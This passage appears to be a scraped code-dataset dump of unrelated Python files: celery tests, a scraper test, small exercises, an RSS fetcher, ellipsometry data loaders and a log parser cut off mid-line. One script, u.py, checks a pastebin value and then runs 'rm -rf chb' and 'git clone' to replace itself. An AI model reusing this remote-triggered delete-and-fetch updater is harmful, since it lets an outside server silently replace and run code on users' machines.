self.app.GroupResult(uuid(), [ar1, ar2])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n self.assertEqual(next(it), 42)\n self.assertEqual(next(it), 42)\n\n def test_join_timeout(self):\n ar = MockAsyncResultSuccess(uuid(), app=self.app)\n ar2 = MockAsyncResultSuccess(uuid(), app=self.app)\n ar3 = self.app.AsyncResult(uuid())\n ts = self.app.GroupResult(uuid(), [ar, ar2, ar3])\n with self.assertRaises(TimeoutError):\n ts.join(timeout=0.0000001)\n\n ar4 = self.app.AsyncResult(uuid())\n ar4.get = Mock()\n ts2 = self.app.GroupResult(uuid(), [ar4])\n self.assertTrue(ts2.join(timeout=0.1))\n\n def test_iter_native_when_empty_group(self):\n ts = self.app.GroupResult(uuid(), [])\n self.assertListEqual(list(ts.iter_native()), [])\n\n def test_iterate_simple(self):\n with self.assertPendingDeprecation():\n it = self.ts.iterate()\n results = sorted(list(it))\n self.assertListEqual(results, list(range(self.size)))\n\n def test___iter__(self):\n self.assertListEqual(list(iter(self.ts)), self.ts.results)\n\n def test_join(self):\n joined = self.ts.join()\n self.assertListEqual(joined, list(range(self.size)))\n\n def test_successful(self):\n self.assertTrue(self.ts.successful())\n\n def test_failed(self):\n self.assertFalse(self.ts.failed())\n\n def test_waiting(self):\n self.assertFalse(self.ts.waiting())\n\n def test_ready(self):\n self.assertTrue(self.ts.ready())\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), len(self.ts))\n\n\nclass test_pending_AsyncResult(AppCase):\n\n def setup(self):\n self.task = self.app.AsyncResult(uuid())\n\n def test_result(self):\n self.assertIsNone(self.task.result)\n\n\nclass test_failed_AsyncResult(test_GroupResult):\n\n def setup(self):\n self.size = 11\n subtasks = make_mock_group(self.app, 10)\n failed = mock_task('ts11', states.FAILURE, KeyError('Baz'))\n save_result(self.app, failed)\n failed_res = self.app.AsyncResult(failed['id'])\n self.ts = self.app.GroupResult(uuid(), subtasks + [failed_res])\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), len(self.ts) - 1)\n\n def test_iterate_simple(self):\n with self.assertPendingDeprecation():\n it = self.ts.iterate()\n\n def consume():\n return list(it)\n\n with self.assertRaises(KeyError):\n consume()\n\n def test_join(self):\n with self.assertRaises(KeyError):\n self.ts.join()\n\n def test_successful(self):\n self.assertFalse(self.ts.successful())\n\n def test_failed(self):\n self.assertTrue(self.ts.failed())\n\n\nclass test_pending_Group(AppCase):\n\n def setup(self):\n self.ts = self.app.GroupResult(\n uuid(), [self.app.AsyncResult(uuid()),\n self.app.AsyncResult(uuid())])\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), 0)\n\n def test_ready(self):\n self.assertFalse(self.ts.ready())\n\n def test_waiting(self):\n self.assertTrue(self.ts.waiting())\n\n def x_join(self):\n with self.assertRaises(TimeoutError):\n self.ts.join(timeout=0.001)\n\n def x_join_longer(self):\n with self.assertRaises(TimeoutError):\n self.ts.join(timeout=1)\n\n\nclass test_EagerResult(AppCase):\n\n def setup(self):\n\n @self.app.task(shared=False)\n def raising(x, y):\n raise KeyError(x, y)\n self.raising = raising\n\n def test_wait_raises(self):\n res = self.raising.apply(args=[3, 3])\n with self.assertRaises(KeyError):\n res.wait()\n self.assertTrue(res.wait(propagate=False))\n\n def test_wait(self):\n res = EagerResult('x', 'x', states.RETRY)\n res.wait()\n self.assertEqual(res.state, states.RETRY)\n self.assertEqual(res.status, states.RETRY)\n\n def test_forget(self):\n res = EagerResult('x', 'x', states.RETRY)\n res.forget()\n\n def test_revoke(self):\n res = self.raising.apply(args=[3, 3])\n self.assertFalse(res.revoke())\n\n\nclass test_tuples(AppCase):\n\n def test_AsyncResult(self):\n x = self.app.AsyncResult(uuid())\n self.assertEqual(x, result_from_tuple(x.as_tuple(), self.app))\n self.assertEqual(x, result_from_tuple(x, self.app))\n\n def test_with_parent(self):\n x = self.app.AsyncResult(uuid())\n x.parent = self.app.AsyncResult(uuid())\n y = result_from_tuple(x.as_tuple(), self.app)\n self.assertEqual(y, x)\n self.assertEqual(y.parent, x.parent)\n self.assertIsInstance(y.parent, AsyncResult)\n\n def test_compat(self):\n uid = uuid()\n x = result_from_tuple([uid, []], app=self.app)\n self.assertEqual(x.id, uid)\n\n def test_GroupResult(self):\n x = self.app.GroupResult(\n uuid(), [self.app.AsyncResult(uuid()) for _ in range(10)],\n )\n self.assertEqual(x, result_from_tuple(x.as_tuple(), self.app))\n self.assertEqual(x, result_from_tuple(x, self.app))\n","repo_name":"Chudry/Xerror","sub_path":"env/lib/python2.7/site-packages/celery/tests/tasks/test_result.py","file_name":"test_result.py","file_ext":"py","file_size_in_byte":24135,"program_lang":"python","lang":"en","doc_type":"code","stars":477,"dataset":"github-code","pt":"16"} +{"seq_id":"37360285773","text":"#coding: utf8\r\n\r\nimport unittest\r\nimport os\r\nfrom workers import cnbeta\r\n\r\nclass CnBetaTests(unittest.TestCase):\r\n\r\n def setUp(self):\r\n dir_name = os.path.dirname(os.path.realpath(__file__))\r\n with open(os.path.join(dir_name, \"testdata/cnbeta/1.txt\"), encoding='utf8') as f:\r\n self.text_data = f.read()\r\n\r\n def test_get_comments_details(self):\r\n details = cnbeta.get_comments_details(self.text_data)\r\n self.assertIsNotNone(details)\r\n self.assertEqual(2, len(details))\r\n self.assertEqual(\"270774\", details[0])\r\n self.assertEqual(\"4f299\", details[1])\r\n\r\n def test_get_op_code(self):\r\n op_code = cnbeta.get_op_code(\"270774\", \"4f299\", 1)\r\n self.assertEqual(\"MSwyNzA3NzQsNGYyOTk=1234567\", op_code)\r\n\r\n def test_get_comments(self):\r\n op_code = \"MSwyNzA2NTAsYTYwMWI%3DuscCHONc\"\r\n comments = cnbeta.get_comments(op_code)\r\n self.assertIsNotNone(comments)\r\n\r\n def test_get_article_list(self):\r\n article_list = cnbeta.get_article_list(1)\r\n self.assertIsNotNone(article_list)\r\n self.assertEqual(30, len(article_list))\r\n","repo_name":"Syndim/NewsReader","sub_path":"website/tests/workers/cnbeta.py","file_name":"cnbeta.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20899756132","text":"import sys\n\n\ndef menu(userinput):\n while userinput is not 'q':\n if userinput == '1':\n print(userinput)\n if userinput == '2':\n print(userinput + str(2))\n if userinput == 'q':\n sys.exit(0)\n print(\"1. GoDie \\n 2. GoSwim\\n 3. GoDance\\n 4. q - Quit\")\n userinput = input(\"Enter your choice: \")\n\n\ndef test():\n print(\"\\n1. GoDie \\n 2. GoSwim\\n 3. GoDance\\n 4. q - Quit\")\n userinput = input(\"Enter your choice: \")\n if userinput == 'q':\n sys.exit(0)\n menu(userinput)\n\n\nif __name__ == '__main__':\n test()","repo_name":"bikash0109/Python-Progs","sub_path":"first sem/Lab7/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22916037464","text":"import sys\r\n\r\nsys.stdin = open(\"b1.in\", \"r\")\r\n#sys.stdout = open(\"b1.out\", \"w\")\r\nT = int(input())\r\n\r\n#B1\r\ndef rec(N):\r\n if N == 1:\r\n return 0\r\n if N % 3 == 0:\r\n Y, Z = N / 3, 2 * N / 3\r\n return int(Y * Z) + rec(Y) + rec(Z)\r\n elif N % 2 == 0:\r\n return int((N/2)**2) + rec(N/2)\r\n else:\r\n return int(N - 1) + int(rec(N - 1))\r\n\r\nfor _ in range(T):\r\n input()\r\n N = int(input())\r\n print(rec(N))\r\n","repo_name":"aajjbb/contest-files","sub_path":"IPSC/BoredomBusters.py","file_name":"BoredomBusters.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"28160671378","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport feedparser\nimport os\nimport re\n\nclass RssFetcher():\n def getCon(self, rssSub):\n self.rssCon = feedparser.parse(rssSub)\n\n def outputer(self, num = 20):\n rssTitle = []\n rssSummary = []\n rssEntries = self.rssCon['entries']\n delPattern = re.compile(\"<a.*?>\")\n for i in range(len(rssEntries)):\n rssTitle.append(rssEntries[i]['title'])\n reSummary = re.sub(\"<img.*?>\", '', ''.join(rssEntries[i]['summary'].split('\\n')))\n reSummary = re.sub(\"<a.*?>\", '', reSummary)\n rssSummary.append(reSummary)\n if i >= num:\n break\n return rssTitle, rssSummary\n\nclass RssFetcher1():\n def getCon(self, rssSub):\n self.rssCon = feedparser.parse(rssSub)\n\n def outputer(self, num = 20):\n rssTitle = []\n rssSummary = []\n rssEntries = self.rssCon['entries']\n summary_pattern = re.compile(\"<p>(.*?)</p>\", re.S)\n for i in range(len(rssEntries)):\n rssTitle.append(rssEntries[i]['title'])\n if not re.findall('<p>', rssEntries[i]['summary']) == []:\n reSummary = '{enter}'.join(summary_pattern.findall(rssEntries[i]['summary']))\n else: reSummary = rssEntries[i]['summary']\n rssSummary.append(reSummary)\n if i >= num:\n break\n return rssTitle, rssSummary\n\n def run(self):\n self.getCon()\n return self.outputer()\n","repo_name":"cycoe/RSSReader","sub_path":"rssFetcher.py","file_name":"rssFetcher.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36213132488","text":"import time\r\n\r\ncasa = float(input('Qual o valor da casa em questão? R$'))\r\nsal = float(input('Qual o salário do comprador? R$'))\r\nanos = int(input('Em quantos anos EXATOS você deseja pagar? >'))\r\n\r\ntrintaPCen = sal * 0.3\r\n\r\nanoMes = anos * 12\r\nmensalidade = casa / anoMes\r\n\r\n\r\ncores = {'vermelho':'\\033[31m',\r\n 'limpo': '\\033[m',\r\n 'verde': '\\033[32m'}\r\n\r\nprint('\\033[97;40mCalculando...\\033[m')\r\ntime.sleep(2)\r\n\r\nif mensalidade > trintaPCen:\r\n print('{}Infelizmente{} o preço da parcela iria lhe causar prejuízo. \\n'\r\n 'Recomendamos aumentar o tempo das parcelas, ou procurar por outra opção.'.format(\r\n cores['vermelho'],cores['limpo']))\r\n\r\n print(cores['vermelho'])\r\n\r\nelse:\r\n print('{}Parabéns!{} O preço está em conta com o seu salário.\\n'\r\n 'Em instantes disponibilizaremos um link e enviaremos para o seu email.\\n'\r\n 'AGUARDE!'.format(cores['verde'],cores['limpo']))\r\n\r\n print(cores['verde'])\r\n\r\ntime.sleep(1)\r\nprint('-='*30)\r\ntime.sleep(1)\r\nprint(f'Valor à pagar R${mensalidade:.2f}/mês, durante {anos} anos.')\r\nprint(f'•O valor máximo com base no seu salário é de {trintaPCen:.2f}')\r\nprint(cores['limpo'])","repo_name":"S4Yuuki/Curso.py","sub_path":"Atividades/036.py","file_name":"036.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"129964661","text":"import sys\nfrom collections import Counter\n\ninput = sys.stdin.readline\n\ncounter = Counter()\nN = int(input())\nfor _ in range(N):\n s = input().strip()\n counter[s] += 1\nprint(sorted(counter.most_common(), key=lambda x:(-x[1], x[0]))[0][0])\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/Hash/1302.py","file_name":"1302.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34311017350","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\"\nA basic representation of a 1D dataset\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom refnx._lib import possibly_open_file\nfrom pathlib import PurePath\n\npd.options.mode.chained_assignment = None\n\n\nclass DataSE(object):\n r\"\"\"\n A basic representation of a 1D dataset.\n\n Parameters\n ----------\n data : {str, file-like, Path, tuple of np.ndarray}, optional\n String pointing to a data file.\n Alternatively it is a tuple containing the data from which the dataset\n will be constructed. The tuple should have 4 members.\n\n - data[0] - Wavelength (nm)\n - data[1] - Angle of incidence (degree)\n - data[2] - Psi\n - data[3] - Delta\n\n `data` must be four long.\n All arrays must have the same shape.\n\n mask : array-like\n Specifies which data points are (un)masked. Must be broadcastable\n to the data. `Data1D.mask = None` clears the mask. If a mask value\n equates to `True`, then the point is included, if a mask value equates\n to `False` it is excluded.\n\n reflect_delta : bool\n Specifies whether delta values are reflected around 180 degrees\n (i.e., 360 - delta[delta > 180]), as is standard for some ellipsometry\n analysis packages (i.e., WVASE).\n\n Attributes\n ----------\n AOI : np.ndarray\n angle of incidence (degree)\n mask : np.ndarray\n mask\n filename : str or None\n The file the data was read from\n weighted : bool\n Whether the y data has uncertainties\n metadata : dict\n Information that should be retained with the dataset.\n \"\"\"\n\n def __init__(\n self, data=None, name=None, delimiter=\"\\t\", reflect_delta=False, **kwds\n ):\n self.filename = None\n\n self.delimiter = delimiter\n self.metadata = kwds\n self._wavelength = np.zeros(0)\n self._aoi = np.zeros(0)\n self._psi = np.zeros(0)\n self._delta = np.zeros(0)\n # TODO when we come up with measurement uncertainties change this.\n self.weighted = False\n self.name = name\n\n # If a file, then open and load the file.\n if (\n hasattr(data, \"read\")\n or type(data) is str\n or isinstance(data, PurePath)\n ):\n self.load(data)\n self.filename = data\n\n # If already a DataSE object, then just use that.\n elif isinstance(data, DataSE):\n self.name = data.name\n self.filename = data.filename\n self.metadata = data.metadata\n self._wavelength = data._wavelength\n self._aoi = data._aoi\n self._psi = data._psi\n self._delta = data._delta\n\n # If a list or tuple, then assume its in format wavelength, AOI, psi, delta.\n elif isinstance(data, (list, tuple, np.ndarray)):\n self._wavelength = data[0]\n self._aoi = data[1]\n self._psi = data[2]\n self._delta = data[3]\n\n self._delta_flipped = False\n if reflect_delta:\n dmask = self._delta > 180\n self._delta[dmask] = 360 - self._delta[dmask]\n self._delta_flipped = True\n\n self.mask = np.ones_like(self._wavelength, dtype=bool)\n\n def __len__(self):\n \"\"\"Number of unmasked points in the dataset.\"\"\"\n return self.wavelength.size\n\n def __str__(self):\n return \"<{0}>, {1} points\".format(self.name, len(self))\n\n def __repr__(self):\n msk = self.mask\n if np.all(self.mask):\n msk = None\n\n d = {\"filename\": self.filename, \"msk\": msk, \"data\": self.data}\n if self.filename is not None:\n return \"Data1D(data={filename!r},\" \" mask={msk!r})\".format(**d)\n else:\n return \"Data1D(data={data!r},\" \" mask={msk!r})\".format(**d)\n\n def unique_wavelength_data(self):\n \"\"\"\n Generator yielding wavelength, AOI, psi, delta tuples for the unique\n wavelengths in a dataset (i.e. all the data points for a given\n wavelength)\n\n Returns\n -------\n wavelength, AOI, psi, delta\n \"\"\"\n unique_wavs = np.unique(self.wavelength)\n for unique_wav in unique_wavs:\n loc = np.where(self.wavelength == unique_wav)\n yield unique_wav, self.aoi[loc], self.psi[loc], self.delta[loc]\n\n @property\n def wavelength(self):\n \"\"\"wavelength(nm)\"\"\"\n\n if self._wavelength.size > 0:\n return self._wavelength[self.mask]\n else:\n return self._wavelength\n\n @property\n def aoi(self):\n \"\"\"Angle of incidence.\"\"\"\n if self._aoi.size > 0:\n return self._aoi[self.mask]\n else:\n return self._aoi\n\n @property\n def psi(self):\n \"\"\"Ellipsometric parameter psi.\"\"\"\n if self._psi.size > 0:\n return self._psi[self.mask]\n else:\n return self._psi\n\n @property\n def delta(self):\n \"\"\"Ellipsometric parameter delta.\"\"\"\n if self._delta.size > 0:\n return self._delta[self.mask]\n else:\n return self._delta\n\n @property\n def data(self):\n \"\"\"4-tuple containing the (wavelength), AOI, psi, delta) data.\"\"\"\n return self.wavelength, self.aoi, self.psi, self.delta\n\n @data.setter\n def data(self, data_tuple):\n \"\"\"\n Set the data for this object from the supplied data.\n\n Parameters\n ----------\n data_tuple : tuple\n 4 member tuple containing the (wav, aoi, psi, delta) data to\n specify the dataset.\n\n Notes\n -----\n Clears the mask for the dataset, it will need to be reapplied.\n\n \"\"\"\n self._wavelength = np.array(data_tuple[0], dtype=float)\n self._aoi = np.array(data_tuple[1], dtype=float)\n self._psi = np.array(data_tuple[2], dtype=float)\n self._delta = np.array(data_tuple[3], dtype=float)\n\n self.mask = np.ones_like(self._wavelength, dtype=bool)\n\n def save(self, f):\n \"\"\"\n Save the data to file. Saves the data as a 4 column ASCII file.\n\n Parameters\n ----------\n f : file-handle or string\n File to save the dataset to.\n\n \"\"\"\n header = \"wavelength\\tAOI\\tPsi\\tDelta\"\n np.savetxt(\n f,\n np.column_stack(\n (self._wavelength, self._aoi, self._psi, self._delta)\n ),\n delimiter=\"\\t\",\n header=header,\n )\n\n def load(self, f):\n \"\"\"\n Load a dataset from file.\n Must be a 4 column ASCII file with columns [wavelength, AOI, Psi, Delta].\n\n Parameters\n ----------\n f : file-handle or string\n File to load the dataset from.\n\n \"\"\"\n\n skip_lines = 0\n with possibly_open_file(f, \"r\") as text:\n for i in range(100): # check the first 100 lines\n try:\n float(text.readline().split(self.delimiter)[0])\n break\n except ValueError:\n skip_lines += 1\n\n self._wavelength, self._aoi, self._psi, self._delta = np.loadtxt(\n f, skiprows=skip_lines, delimiter=self.delimiter, encoding=\"utf8\"\n ).T\n\n def refresh(self):\n \"\"\"\n Refreshes a previously loaded dataset.\n\n \"\"\"\n if self.filename is not None:\n with open(self.filename) as f:\n self.load(f)\n\n\ndef open_EP4file(fname, reflect_delta=False):\n \"\"\"\n Open and load in an Accurion EP4 formmated data file.\n Typically a .dat file.\n\n Note: This file parser has been written for specific Accurion ellipsometers\n EP3 and EP4. No work has been done to ensure it is compatible with all\n Accurion ellipsometers. If you have trouble with this parser contact the\n maintainers through github.\n\n Parameters\n ----------\n fname : file-handle or string\n File to load the dataset from.\n\n reflect_delta : bool\n Option to reflect delta around 180 degrees (as WVASE would).\n\n Returns\n ----------\n datasets : DataSE structure\n Structure containing wavelength, angle of incidence, psi and delta.\n\n\n \"\"\"\n df = pd.read_csv(fname, sep=\"\\t\", skiprows=[1])\n df = df.dropna(axis=0, how=\"any\")\n # normally the NaN are at the end of the file, but they can also be in\n # the middle\n df = df.reset_index()\n\n try:\n df[\"Time\"]\n time_data = True\n except KeyError:\n time_data = False\n print(\"No time data.\")\n\n if time_data and len(df[\"Time\"].drop_duplicates()) > 1:\n print(\"Treating as time series:\")\n output = []\n for t in df[\"Time\"].drop_duplicates():\n tdf = df[df[\"Time\"] == t]\n output += _loadEP4(tdf) # not sure if this will work\n output[-1][\"time\"] = t\n else:\n output = _loadEP4(df)\n for op in output:\n op[\"time\"] = None\n\n datasets = []\n for op in output:\n data = [op[\"lambda\"], op[\"aoi\"], op[\"psi\"], op[\"delta\"]]\n del op[\"lambda\"]\n del op[\"aoi\"]\n del op[\"psi\"]\n del op[\"delta\"]\n name = _make_EP4dname(fname, op)\n datasets.append(\n DataSE(data, name=name, reflect_delta=reflect_delta, **op)\n )\n\n if len(datasets) == 1:\n return datasets[0]\n else:\n return datasets\n\n\ndef _make_EP4dname(name, metadata):\n \"\"\"\n Create a helpful name for a data set based on an Accurion EP4\n formatted data file.\n\n Parameters\n ----------\n name : file-handle or string\n File name of data set.\n\n metadata : dict\n Dict containinng 'X pos', 'Y pos' and 'time' data.\n\n Returns\n ----------\n base : string\n Helpful name for the data set.\n\n \"\"\"\n name = str(name)\n base = name[: -len(\"_20200929-083122.ds.dat\")]\n if metadata[\"X pos\"] is not None:\n base += f\"_x={metadata['X pos']}mm_y={metadata['Y pos']}mm\"\n if metadata[\"time\"] is not None:\n base += f\"_t={metadata['time']}s\"\n return base\n\n\ndef custom_round(x, base=0.25):\n \"\"\"\n Perform rounding to a particular base. Default base is 0.25.\n\n Parameters\n ----------\n x : DataFrame, array or list\n Data to be rounded.\n\n base : float\n Base that the rounding will be with respect to.\n\n Returns\n ----------\n Result of cutsom round : np.array\n\n \"\"\"\n x = np.array(x, dtype=float)\n return np.round((base * np.round(x / base)), 2)\n\n\ndef _loadEP4(df):\n \"\"\"\n Specifically loading a data file created by an Accurion EP4 ellipsometer.\n Dataframe should have colums ['#Lambda','AOI','Psi','Delta'].\n Optionally can also have columns [X_pos, Y_pos].\n\n\n Parameters\n ----------\n df : DataFrame\n Data frame containing the wavelength, angle of incidence, psi and\n delta data.\n\n Returns\n ----------\n output : list of dicts\n Dicts containing wavelength, angle of indcidence, psi, delta and\n possible X pos and Y pos.\n\n \"\"\"\n\n try:\n df[\"X_pos\"]\n df[\"Y_pos\"]\n loc_data = True\n except KeyError:\n loc_data = False\n\n if loc_data and (\n len(df[\"X_pos\"].drop_duplicates()) > 1\n or len(df[\"Y_pos\"].drop_duplicates()) > 1\n ):\n xpos = np.nan\n ypos = np.nan\n\n area_indices = []\n for entry in df.iterrows():\n if (not np.allclose(xpos, entry[1][\"X_pos\"], atol=0.2)) or (\n not np.allclose(ypos, entry[1][\"Y_pos\"], atol=0.2)\n ):\n idx = entry[0]\n xpos = entry[1][\"X_pos\"]\n ypos = entry[1][\"Y_pos\"]\n area_indices.append(idx)\n area_indices.append(len(df))\n\n if len(area_indices) > 2:\n print(\"Treating as multiple locations\")\n else:\n print(\"Treating as single location\")\n\n output = []\n for i in range(len(area_indices) - 1):\n pdf = df.loc[area_indices[i] : area_indices[i + 1] - 1][\n [\"#Lambda\", \"AOI\", \"Psi\", \"Delta\", \"X_pos\", \"Y_pos\"]\n ]\n\n if len(pdf.index) > 0:\n ave_pos = pdf.groupby([\"AOI\", \"#Lambda\"]).mean()\n ave_pos = ave_pos.reset_index()\n\n summary = {\n \"lambda\": np.array(ave_pos[\"#Lambda\"]),\n \"aoi\": np.array(ave_pos[\"AOI\"]),\n \"psi\": np.array(ave_pos[\"Psi\"]),\n \"delta\": np.array(ave_pos[\"Delta\"]),\n \"X pos\": np.round(np.mean(ave_pos[\"X_pos\"]), 2),\n \"Y pos\": np.round(np.mean(ave_pos[\"Y_pos\"]), 2),\n }\n output.append(summary)\n else:\n print(\"Treating as single location\")\n df = df[[\"#Lambda\", \"AOI\", \"Psi\", \"Delta\"]]\n ave_pos = df.groupby([\"AOI\", \"#Lambda\"]).mean()\n ave_pos = ave_pos.reset_index()\n\n summary = {\n \"lambda\": np.array(ave_pos[\"#Lambda\"]),\n \"aoi\": np.array(ave_pos[\"AOI\"]),\n \"psi\": np.array(ave_pos[\"Psi\"]),\n \"delta\": np.array(ave_pos[\"Delta\"]),\n \"X pos\": None,\n \"Y pos\": None,\n }\n output = [summary]\n\n return output\n\n\ndef open_HORIBAfile(\n fname, reflect_delta=False, lambda_cutoffs=[-np.inf, np.inf]\n):\n \"\"\"\n Opening and loading in a data file created by a Horiba ellipsometer. Data\n file loaded should be of the Horiba file format .spe.\n\n Note: This file parser has been written for a specific ellipsometer, no\n work has been done to ensure it is compatable with all Horiba\n ellipsometers. If you have trouble with this parser contact the maintainers\n through github.\n\n Parameters\n ----------\n fname : file-handle or string\n File to load the dataset from.\n\n reflect_delta : bool\n Option to reflect delta around 180 degrees (as WVASE would).\n\n lambda_cutoffs : list\n Specifies the minimum and maximum wavelengths of data to be loaded.\n List has length 2.\n\n Returns\n ----------\n DataSE : DataSE structure\n The data file structure from the loaded Horiba file.\n\n \"\"\"\n\n name = fname[:-4]\n metadata = {}\n linenodict = {}\n MDingest = False\n\n with open(fname, \"r\") as f:\n lines = f.readlines()\n\n for i, line in enumerate(lines):\n line = line.strip() # Drop newline character\n if not MDingest:\n if len(line) and line[0] == \"#\":\n MDlabel = \" \".join(line.split(\" \")[1:])[:-1]\n metadata[MDlabel] = []\n linenodict[MDlabel] = i\n MDingest = True\n\n else:\n if not len(line):\n MDingest = False\n if not len(\n metadata[MDlabel]\n ): # there is no metadata for entry\n metadata[MDlabel] = None # Set metadata to none\n elif len(metadata[MDlabel]) == 1: # there is only one entry\n metadata[MDlabel] = metadata[MDlabel][\n 0\n ] # remove data from list\n\n else: # there is metadata in the line\n metadata[MDlabel].append(\n line\n ) # append line to metadata entry\n\n data_df = pd.read_csv(\n fname,\n skiprows=linenodict[\"DATA\"] + 1,\n nrows=len(metadata[\"DATA\"]) - 1,\n encoding=\"ANSI\",\n delimiter=\" \",\n usecols=[\"nm\", \"Psi\", \"Delta\"],\n )\n\n AOI = float(metadata[\"INCIDENCE ANGLE\"][:5])\n data_df[\"AOI\"] = AOI * np.ones_like(data_df[\"nm\"])\n data_df = data_df[data_df[\"nm\"] > lambda_cutoffs[0]]\n data_df = data_df[data_df[\"nm\"] < lambda_cutoffs[1]]\n\n data = [data_df[\"nm\"], data_df[\"AOI\"], data_df[\"Psi\"], data_df[\"Delta\"]]\n\n return DataSE(data, name=name, reflect_delta=reflect_delta, **metadata)\n","repo_name":"refnx/refellips","sub_path":"refellips/dataSE.py","file_name":"dataSE.py","file_ext":"py","file_size_in_byte":16035,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"38786469785","text":"s = list(input())\n\nmax = 0\nfor i in range(len(s)):\n for j in reversed(range(len(s) + 1)):\n cnt = 0\n for k in range(i, j):\n if s[k] == \"A\" or s[k] == \"C\" or s[k] == \"G\" or s[k] == \"T\":\n cnt += 1\n else:\n cnt = 0\n break\n if max < cnt:\n max = cnt\nprint(max)\n","repo_name":"RuRey0310/Competitive_Programming","sub_path":"ABC100~150/ABC122/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13322755031","text":"import getpass,time,os,sys\nimport os \nab=\"1\"\nimport signal\nimport time,os,sys\nimport sys, random\nimport threading,time\nimport os,requests\nos.system(\"pip install mechanize \")\nblue= '\\33[94m'\nlightblue = '\\033[94m'\nred = '\\033[91m'\nwhite = '\\33[97m'\nyellow = '\\33[93m'\ngreen = '\\033[1;32m'\ncyan = \"\\033[96m\"\nend = '\\033[0m'\nblack=\"\\033[0;30m\"\nblue= '\\33[94m'\nlightblue = '\\033[94m'\nred = '\\033[91m'\nwhite = '\\33[97m'\nyellow = '\\33[93m'\ngreen = '\\033[1;32m'\ncyan = \"\\033[96m\"\nend = '\\033[0m'\nblack=\"\\033[0;30m\"\npink=\"\\x1b[95m\"\nblue=\"\\x1b[94m\"\nunderline='\\x1b[4m'\ncolouroff=\"\\x1b[00m\"\nimport os,sys,time,random\nprint(\"\")\nprint(\"\")\ncolor = [\"\\033[1;31m\",\"\\033[1;32m\", \"\\033[96m\", '\\33[93m' '\\33[94m']\nm = random.choice(color)+\"Update CK \"\nfor msg in m:\n sys.stdout.write(msg)\n sys.stdout.flush()\n time.sleep(0.09)\nprint(\"\")\n\nlogu=(pink+f\"\"\"\n\\t ____ _ _ ____\n\\t / ___| | | | | | __ )\n\\t| | | |_| | | _ \\ \"\"\"+colouroff+underline+\"\"\"CYBER HUNTER BD\"\"\"+colouroff+pink+\"\"\"\n\\t| |___ | _ | | |_) |\n\\t \\____| |_| |_| |____/ \n\\n\"\"\"+blue+\"\"\" Focous on Your Aim, You Will winner\"\"\")\n\n\nline=end+\"\\n__________________________________________________________\"\ndef a():\n\tprint(logu+\"\\n\\n\t\"+green+\" Developed By : MD ALAMIN CHOWDORY\"+green+\"\\n\\n \t\"+red+\" \\n\\n \"+line)\na()\n\nr=requests.get(\"https://pastebin.com/zHRgbXCi\").text\n\nr2=str(r)\n\nif ab==r2:\n pass\n os.system(\"python main.py\")\n \nelse:\n print(\"update This Tool \")\n \n os.system(\"cd $home && rm -rf chb && git clone https://github.com/CyberHanterBangladesh/chb \")\n \n","repo_name":"HIDDEN-VIRUS/chb","sub_path":"u.py","file_name":"u.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"69828021449","text":"# -*- coding=utf-8 -*-\r\n# author: zhihua.ye@spreadtrum.com\r\n\r\nimport sys\r\nimport os\r\n#sys.path.append('./')\r\n#print sys.path\r\nimport definition\r\nfrom config import *\r\nfrom lib.logConf import logConf\r\nfrom lib.logutils import logutils\r\nfrom helper.processmap import *\r\nfrom helper.excelhelper import *\r\nimport re\r\nfrom easygui import *\r\n\r\n#TODO list:\r\n#1. find pid by words\r\n#1.1 pid may change, process restart\r\n#2. unittest\r\n#3. decode flow\r\n#3.1 idea is different from old style:\r\n# media only need the process, simple is beautiful.\r\n# record start\r\n\r\n# record end\r\n# for phrase one:\r\n# 1. log grep\r\n# 2. data statistics\r\n# TODO: 3. vowifi video start/stop\r\n# FIXED: 4. call info\r\n# FIXED: record statistics, pps, sps,rtp\r\n# TODO: add simple UI.\r\n\r\nclass mflow:\r\n def __init__(self, logname='', outdir='./', loglevel='DEBUG'):\r\n self.log = os.path.realpath(logname)\r\n with open(self.log, 'rb') as logfile:\r\n self.loglines = logfile.readlines()\r\n self.logger = logConf(debuglevel=loglevel)\r\n self.logger.logger.info('init flow')\r\n self.config = config()\r\n self.logutils = logutils()\r\n\r\n logbasename = os.path.basename(logname)\r\n # get prefix, get timestamp\r\n prefix = logbasename.split('.')[0]\r\n self.version = self.config.getversion()\r\n #output is in one extra dir\r\n self.outdir = os.path.dirname(logname) + '/output'\r\n self.logutils.mkdirp(self.outdir)\r\n\r\n self.trimlog = self.outdir + '/' + prefix + '_' +self.logger.timestamp +'_media.log'\r\n with open(self.trimlog, 'a+')as trimlog:\r\n trimlog.truncate()\r\n\r\n self.excel = self.outdir + '/' + prefix + '_' +self.logger.timestamp +'_statictics.xlsx'\r\n\r\n #final eventmsg should be processed\r\n self.eventmsgs = list()\r\n\r\n #pid should be a verbose list\r\n self.pids = list()\r\n\r\n #call list\r\n self.calllist = list()\r\n\r\n #call number\r\n self.callnum = 0\r\n\r\n #Do we really need this F*cking global flag\r\n self.incall = False\r\n self.curcall 